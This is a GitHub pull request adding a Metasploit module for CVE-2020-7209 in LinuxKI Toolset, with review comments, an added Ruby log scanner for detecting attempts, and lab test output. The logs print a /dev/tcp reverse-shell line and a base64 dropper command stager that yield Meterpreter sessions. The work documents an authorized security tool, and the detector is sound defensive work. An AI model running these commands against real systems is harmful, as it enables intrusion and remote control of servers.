Add new module linuxki_rce - CVE-2020-7209 #13537

Merged
merged 13 commits into from
Jun 10, 2020
Conversation

@numanturle numanturle commented May 29, 2020

LinuxKI Toolset v6.0-1 and earlier is vulnerable to remote code execution. The vulnerability is triggered via the kivis.php pid parameter.

Verification

  • Start msfconsole
  • use exploit/linux/http/linuxki_rce
  • show TARGETS
  • set TARGET <id>
  • set RHOST <target_ip>
  • set RPORT <target_port>
  • Ideally run check
  • set LHOST <your_ip>
  • set LPORT <your_port>
  • exploit

Scenarios

msf5 > use exploit/linux/http/linuxki_rce
msf5 exploit(linux/http/linuxki_rce) > set rhosts 10.0.0.1
rhosts => 10.0.0.1
msf5 exploit(linux/http/linuxki_rce) > set rport 8080
rport => 8080
msf5 exploit(linux/http/linuxki_rce) > check
[+] 10.0.0.1:8080 - The target is vulnerable.
msf5 exploit(linux/http/linuxki_rce) > set lhost 10.0.0.5
lhost => 10.0.0.5
msf5 exploit(linux/http/linuxki_rce) > run
[*] Started reverse TCP handler on 10.0.0.5:4444
[*] Sending exploit...
[*] Command shell session 1 opened (10.0.0.5:4444 -> 10.0.0.1:58914) at 2020-05-19 08:32:32 +0300
id
uid=48(apache) gid=48(apache) groups=48(apache)
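A defender-side companion to the vulnerability described above, added here as an example and not part of this PR, the module, or the LinuxKI project: it scans httpd combined-format access log lines (constructed samples) for GET requests to kivis.php whose pid parameter is not a plain numeric process id, which is the shape a CVE-2020-7209 attempt would take in the logs. The assumptions that a legitimate pid is digits only and at most 7 digits, and the sample log lines themselves, are mine.

```ruby
# Added example (not from the PR or the LinuxKI project): flag GET requests to
# kivis.php whose "pid" parameter is not a plain process id. The PR says the
# vulnerability is triggered through that parameter, so a non-numeric pid is the
# signal a defender would alert on. All log lines below are constructed.
require 'uri'
require 'cgi'

# httpd combined log format (the PR was tested against httpd).
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/

# Returns the decoded pid value for a kivis.php request, or nil when the line
# is not a kivis.php request (any deployment path, matched on the basename).
def kivis_pid(line)
  m = LOG_RE.match(line)
  return nil unless m
  uri = URI.parse(m[:path]) rescue nil # malformed request-lines are ignored
  return nil unless uri && File.basename(uri.path) == 'kivis.php' && uri.query
  CGI.parse(uri.query)['pid'].first  # CGI.parse yields [] for absent keys
end

# Assumption: a legitimate pid is a bounded run of digits. Anything else
# (shell metacharacters, URL-encoded payloads, whitespace) is suspicious.
def suspicious_pid?(pid)
  return false if pid.nil?
  !(pid =~ /\A\d{1,7}\z/)
end

# Scan log lines and return the suspicious ones with their decoded pid.
def scan_access_log(lines)
  lines.each_with_object([]) do |line, hits|
    pid = kivis_pid(line)
    hits << { line: line, pid: pid } if suspicious_pid?(pid)
  end
end

# Constructed samples: a benign kivis.php request, one whose pid carries an
# encoded command separator, and an unrelated request that must not match.
SAMPLE_LOG = [
  '10.0.0.5 - - [19/May/2020:08:32:01 +0300] "GET /kivis.php?pid=1234 HTTP/1.1" 200 5123',
  '10.0.0.5 - - [19/May/2020:08:32:30 +0300] "GET /tools/kivis.php?pid=1234%3Bid HTTP/1.1" 200 331',
  '10.0.0.5 - - [19/May/2020:08:33:00 +0300] "GET /index.php?pid=abc HTTP/1.1" 200 120'
].freeze

if __FILE__ == $0
  scan_access_log(SAMPLE_LOG).each do |hit|
    puts "suspicious pid #{hit[:pid].inspect}: #{hit[:line]}"
  end
end
```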

@numanturle numanturle changed the title Add new module linuxki_rce Add new module linuxki_rce - CVE-2020-7209 May 29, 2020
@h00die h00die left a comment

Please run:

  1. rubocop -a on your ruby file
  2. tools/dev/msftidy.rb on your ruby file
  3. tools/dev/msftidy_docs.rb on your markdown file.

That will address many of the changes needed. I've added a few more items as well. Good first time contribution though!

@bcoles bcoles added the module label May 29, 2020
CmdStager included
@numanturle numanturle requested a review from h00die May 30, 2020 08:09
@numanturle numanturle left a comment

Okay.

@numanturle numanturle requested a review from bcoles June 1, 2020 19:47
bcoles commented Jun 3, 2020

Please add a Linux command stager target. Take a look at modules/exploits/unix/webapp/drupal_drupalgeddon2.rb for example targets.

@space-r7 space-r7 added the docs label Jun 3, 2020
@cdelafuente-r7 cdelafuente-r7 self-assigned this Jun 5, 2020
@cdelafuente-r7 cdelafuente-r7 left a comment

@numanturle, thanks for this PR. This is a great first contribution! I just added a few comments for you to look at.

Co-authored-by: cdelafuente-r7 <56716719+cdelafuente-r7@users.noreply.github.com>
@cdelafuente-r7
@numanturle, these changes look good to me. Thanks!

Regarding your question (here), do you still plan to add default payload to each target and be automatically selected when the target changes? If not, I will go ahead and land it.

@cdelafuente-r7
@h00die, it looks like the changes you requested were made (still pending approval). Are we good to land?

@h00die h00die left a comment

A few doc cleanup items. @cdelafuente-r7 you can probably make these changes when landing as they're super minor.

h00die commented Jun 9, 2020

Other than those few doc changes I just added, I'm happy with it.

@numanturle

> @numanturle, these changes look good to me. Thanks!
>
> Regarding your question (here), do you still plan to add default payload to each target and be automatically selected when the target changes? If not, I will go ahead and land it.

I added default payloads 👍

@cdelafuente-r7

I tested this exploit against LinuxKI Toolset v6.01 on an x64 CentOS 7.8.2003 virtual machine, with httpd running in a Docker container, as described in your module documentation. I successfully got a session with every target. I also verified that the payload is set up automatically when the target changes.

Example output
-----------------------------------------------------------------------------------
The pg and/or activerecord gem version has changed, meaning deprecated pg constants
may no longer be in use, so try deleting this file to see if the
'The PGconn, PGresult, and PGError constants are deprecated...' message has gone:
/Users/cdelafuente/dev/src/metasploit-framework/lib/pg/deprecated_constants.rb
-----------------------------------------------------------------------------------


IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v5.0.92-dev-9e810cb345               ]
+ -- --=[ 2024 exploits - 1100 auxiliary - 343 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Use the resource command to run commands from a file

msf5 > use exploit/linux/http/linuxki_rce
msf5 exploit(linux/http/linuxki_rce) > set payload 0
msf5 exploit(linux/http/linuxki_rce) > options

Module options (exploit/linux/http/linuxki_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path to the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)


msf5 exploit(linux/http/linuxki_rce) > set RHOSTS 172.16.60.173
RHOSTS => 172.16.60.173
msf5 exploit(linux/http/linuxki_rce) > set RPORT 32777
RPORT => 32777
msf5 exploit(linux/http/linuxki_rce) > set LHOST 172.16.60.1
LHOST => 172.16.60.1
msf5 exploit(linux/http/linuxki_rce) > set verbose true
verbose => true
msf5 exploit(linux/http/linuxki_rce) > check
[+] 172.16.60.173:32777 - The target is vulnerable.
msf5 exploit(linux/http/linuxki_rce) > run

[*] Started reverse TCP handler on 172.16.60.1:4444
[*] Executing Automatic (PHP In-Memory) target
[*] Sending payload...
[*] Sending stage (38288 bytes) to 172.16.60.173
[*] Meterpreter session 1 opened (172.16.60.1:4444 -> 172.16.60.173:59092) at 2020-06-10 11:18:49 +0200

meterpreter > getuid
Server username:  (48)
meterpreter > sysinfo
Computer    : 1e562def69e5
OS          : Linux 1e562def69e5 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
Meterpreter : php/linux
meterpreter > [*] Shutting down Meterpreter...

[*] 172.16.60.173 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(linux/http/linuxki_rce) > set target 1
target => 1
msf5 exploit(linux/http/linuxki_rce) > options

Module options (exploit/linux/http/linuxki_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.16.60.173    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      32777            yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path to the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.60.1      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Automatic (PHP Dropper)


msf5 exploit(linux/http/linuxki_rce) > run

[*] Started reverse TCP handler on 172.16.60.1:4444
[*] Executing Automatic (PHP Dropper) target
[*] Sending payload...
[*] Sending stage (38288 bytes) to 172.16.60.173
[*] Meterpreter session 2 opened (172.16.60.1:4444 -> 172.16.60.173:59094) at 2020-06-10 11:19:46 +0200
[!] This exploit may require manual cleanup of '/tmp/dKuRXOy3A30DI7L5Leh.php' on the target

meterpreter > sysinfo
Computer    : 1e562def69e5
OS          : Linux 1e562def69e5 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
Meterpreter : php/linux
meterpreter > [*] Shutting down Meterpreter...

[*] 172.16.60.173 - Meterpreter session 2 closed.  Reason: User exit
msf5 exploit(linux/http/linuxki_rce) > set target 2
target => 2
msf5 exploit(linux/http/linuxki_rce) > options

Module options (exploit/linux/http/linuxki_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.16.60.173    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      32777            yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path to the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.60.1      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   Automatic (Unix In-Memory)


msf5 exploit(linux/http/linuxki_rce) > run

[+] 0<&86-;exec 86<>/dev/tcp/172.16.60.1/4444;sh <&86 >&86 2>&86
[*] Started reverse TCP handler on 172.16.60.1:4444
[*] Executing Automatic (Unix In-Memory) target
[*] Sending payload...
[*] Command shell session 3 opened (172.16.60.1:4444 -> 172.16.60.173:59096) at 2020-06-10 11:21:01 +0200
id

uid=48(apache) gid=48(apache) groups=48(apache)
uname -a
Linux 1e562def69e5 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 172.16.60.173 - Command shell session 3 closed.
msf5 exploit(linux/http/linuxki_rce) > set target 3
target => 3
msf5 exploit(linux/http/linuxki_rce) > options

Module options (exploit/linux/http/linuxki_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.16.60.173    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      32777            yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path to the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.60.1      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   3   Automatic (Linux Dropper)


msf5 exploit(linux/http/linuxki_rce) > run

[*] Started reverse TCP handler on 172.16.60.1:4444
[*] Executing Automatic (Linux Dropper) target
[*] Sending payload...
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1torBA8AWgCABFcieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/TxcFJ.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/rnEuO' < '/tmp/TxcFJ.b64' ; chmod +x '/tmp/rnEuO' ; '/tmp/rnEuO' ; rm -f '/tmp/rnEuO' ; rm -f '/tmp/TxcFJ.b64'"]
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (980808 bytes) to 172.16.60.173
[*] Meterpreter session 4 opened (172.16.60.1:4444 -> 172.16.60.173:59098) at 2020-06-10 11:22:47 +0200
[*] Command Stager progress - 100.00% done (763/763 bytes)

meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : CentOS 7.8.2003 (Linux 3.10.0-1127.10.1.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > [*] Shutting down Meterpreter...

[*] 172.17.0.2 - Meterpreter session 4 closed.  Reason: User exit
msf5 exploit(linux/http/linuxki_rce) >

@cdelafuente-r7

@numanturle, thanks for this great contribution! I will go ahead and land it today.

@numanturle

> @numanturle, thanks for this great contribution! I will go ahead and land it today.

I am learning new things and enjoying it very much. ❤️

@cdelafuente-r7 cdelafuente-r7 merged commit 797673f into rapid7:master Jun 10, 2020
cdelafuente-r7 commented Jun 10, 2020

Release Notes

The LinuxKI Toolset 6.01 Remote Command Execution module exploits an RCE in LinuxKI Toolset v6.01 and earlier. This vulnerability is related to improper input validation of an HTTP GET parameter. An attacker can leverage this to execute arbitrary commands in the context of the webserver. This vulnerability is identified as CVE-2020-7209.

@tperry-r7 tperry-r7 added the rn-modules release notes for new or majorly enhanced modules label Jun 25, 2020